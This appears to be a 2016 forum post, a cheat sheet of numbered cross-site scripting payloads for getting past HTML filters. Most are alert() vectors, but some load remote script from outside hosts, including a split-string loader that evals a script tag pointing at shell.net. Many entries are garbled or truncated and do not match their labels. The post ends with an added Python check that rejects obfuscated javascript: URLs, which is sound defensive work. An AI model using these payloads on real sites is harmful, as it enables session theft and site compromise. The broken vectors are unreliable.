XSS Attack Roundup

OP | Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection:
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Doubled opening bracket
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Doubled opening angle bracket
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

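Most of the vectors in this list smuggle a javascript: URL past a naive filter with the same few tricks: mixed case (4), HTML character references with and without semicolons (5, 8, 9, 10), embedded tabs, newlines and carriage returns (11-14), and null bytes (17). The following is an added defensive example, not code from the original post: a Python check for src/href attribute values that normalizes the value the way a browser would before allowing only an explicit scheme list, run against constructed copies of those vectors. The scheme allowlist, the helper names and the sample vectors are my own assumptions.

```python
import html
import re
from typing import Dict, Optional

# Control characters (NUL, tab, CR, LF, ...) and spaces that browsers drop from
# a URL before parsing its scheme; vectors 11-14 and 17 in the post rely on them.
_DROPPED = re.compile(r"[\x00-\x20\x7f]")
# Schemes allowed in src/href attributes (assumed policy for this example).
_ALLOWED_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url(value: str) -> str:
    """Undo the obfuscations a browser undoes before it looks at the scheme."""
    decoded = html.unescape(value)       # &#106; &#0000106 &#x6A, with or without ';'
    decoded = _DROPPED.sub("", decoded)  # jav\tascript:, jav\nascript:, java\0script:
    return decoded.lower()               # JaVaScRiPt: (vector 4)


def is_safe_url(value: str) -> bool:
    """True if the attribute value is relative or uses an allowed scheme."""
    match = _SCHEME.match(normalize_url(value))
    if match is None:
        return True  # no scheme: "/path", "#frag" or "//host/x", resolved against the page
    return match.group(1) in _ALLOWED_SCHEMES


def safe_src_attr(value: str) -> Optional[str]:
    """Emit a quoted src="..." attribute, or None if the URL is rejected."""
    if not is_safe_url(value):
        return None
    # Quoting plus escaping keeps ?<B> style suffixes (vector 24) inside the attribute.
    return 'src="%s"' % html.escape(value, quote=True)


# Constructed test vectors modelled on the post, mapped to the expected verdict.
SAMPLE_VECTORS: Dict[str, bool] = {
    "http://3w.org/XSS/xss.js": True,
    "//3w.org/XSS/xss.js": True,
    "JaVaScRiPt:alert('XSS')": False,
    "jav\tascript:alert('XSS')": False,
    "jav&#x09;ascript:alert('XSS')": False,
    "java\0script:alert('XSS')": False,
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')": False,
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74:alert('XSS')": False,
    "vbscript:msgbox('XSS')": False,
}


def screen_vectors() -> Dict[str, bool]:
    """Run every sample vector through the check; should equal SAMPLE_VECTORS."""
    return {vector: is_safe_url(vector) for vector in SAMPLE_VECTORS}
```

Note that this only covers URL-valued attributes; the CSS expression(), meta refresh and event-handler vectors in the list need a real HTML sanitizer that drops those attributes and tags outright.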